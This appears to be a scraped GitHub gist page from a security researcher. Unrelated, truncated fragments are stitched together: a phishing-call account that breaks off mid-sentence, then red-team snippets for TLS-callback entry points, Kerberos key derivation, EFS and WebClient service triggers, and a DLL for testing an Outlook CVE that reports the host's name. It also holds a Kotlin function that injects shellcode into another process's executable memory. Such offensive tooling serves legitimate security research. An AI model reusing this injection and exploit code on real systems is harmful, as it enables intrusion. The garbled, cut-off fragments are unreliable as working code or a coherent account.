Mariusz Banach mgeeky


g.co, Google's official URL shortcut (update: or Google Workspace's domain verification, see bottom), is compromised. People are actively having their Google accounts stolen.

Someone just tried the most sophisticated phishing attack I've ever seen. I almost fell for it. My mind is a little blown.

  1. Someone named "Chloe" called me from 650-203-0000 with Caller ID saying "Google". She sounded like a real engineer, the connection was super clear, and she had an American accent. Screenshot.

  2. They said that they were from Google Workspace and someone had recently gained access to my account, which they had blocked. They asked me if I had recently logged in from Frankfurt, Germany and I said no.

  3. I asked if they can confirm this is Google calling by emailing me from a Google email and they said sure and sent me this email and told me to look for a case number in it, which I saw in

#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "winmm.lib")
void Nothing(WORD wKey)
{
}
void PrintKey(WORD wKey)
@mgeeky
mgeeky / DynamicLibrary.cpp
Created December 18, 2024 11:17 — forked from Washi1337/DynamicLibrary.cpp
Injecting unconventional entry points in a .NET module. Blog post: https://washi.dev/blog/posts/entry-points/
#include <cstdio>
#include <windows.h>
VOID WINAPI TlsCallback(PVOID DllHandle, DWORD Reason, PVOID Reserved)
{
puts("[DynamicLibrary.dll]: TLS Callback");
}
#ifdef _WIN64
#pragma comment (linker, "/INCLUDE:_tls_used")
@mgeeky
mgeeky / Get-KerberosAESKey.ps1
Created December 10, 2024 20:25 — forked from Kevin-Robertson/Get-KerberosAESKey.ps1
Generate Kerberos AES keys from a known password
function Get-KerberosAESKey
{
<#
.SYNOPSIS
Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The
results have been verified against the test values in RFC3962, MS-KILE, and my own test lab.
https://tools.ietf.org/html/rfc3962
https://msdn.microsoft.com/library/cc233855.aspx
@mgeeky
mgeeky / Spamassassin rules description
Created December 5, 2024 19:37 — forked from ychaouche/Spamassassin rules description
Spamassassin rules description
AC_BR_BONANZA Too many newlines in a row... spammy template
ACCESSDB Message would have been caught by accessdb
ACCT_PHISHING_MANY Phishing for account information
AC_DIV_BONANZA Too many divs in a row... spammy template
AC_FROM_MANY_DOTS Multiple periods in From user name
AC_HTML_NONSENSE_TAGS Many consecutive multi-letter HTML tags, likely nonsense/spam
AC_POST_EXTRAS Suspicious URL
AC_SPAMMY_URI_PATTERNS10 link combos match highly spammy template
AC_SPAMMY_URI_PATTERNS11 link combos match highly spammy template
AC_SPAMMY_URI_PATTERNS12 link combos match highly spammy template
@mgeeky
mgeeky / main.c
Created December 5, 2024 16:57 — forked from dadevel/main.c
EFS Trigger
#include <windows.h>

/* Creating a file with FILE_ATTRIBUTE_ENCRYPTED asks Windows to protect it
 * with EFS, which starts the EFS service on demand if it is not already
 * running (hence "EFS Trigger"). FILE_FLAG_DELETE_ON_CLOSE removes the file
 * again as soon as the handle is closed, so nothing is left on disk. */
int main() {
    HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL);
    /* CreateFileA reports failure with INVALID_HANDLE_VALUE (not NULL);
     * the Win32 error code is returned as the process exit status. */
    if (!file || file == INVALID_HANDLE_VALUE) {
        return GetLastError();
    }
    CloseHandle(file);
    return 0;
}
@mgeeky
mgeeky / EtwStartWebClient.cs
Created December 5, 2024 14:13 — forked from klezVirus/EtwStartWebClient.cs
A PoC in C# to enable WebClient Programmatically
using System.Runtime.InteropServices;
using System;
/*
* Simple C# PoC to enable WebClient Service Programmatically
* Based on the C++ version from @tirannido (James Forshaw)
* Twitter: https://twitter.com/tiraniddo
* URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
*
* Compile with:
fun injectShellcode(vararg shellcode: Int) {
val length = shellcode.size
val hProcess = (lms!! as WindowsProcess).handle
val internalBlock = Kernel32.VirtualAllocEx(hProcess, 0, shellcode.size,
WinNT.MEM_COMMIT, WinNT.PAGE_EXECUTE_READWRITE)
val buffer = Memory(shellcode.size.toLong())
for (i in 0..shellcode.lastIndex) buffer.setByte(i.toLong(), shellcode[i].toByte())
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
@mgeeky
mgeeky / test_dll.c
Created November 26, 2024 16:23 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and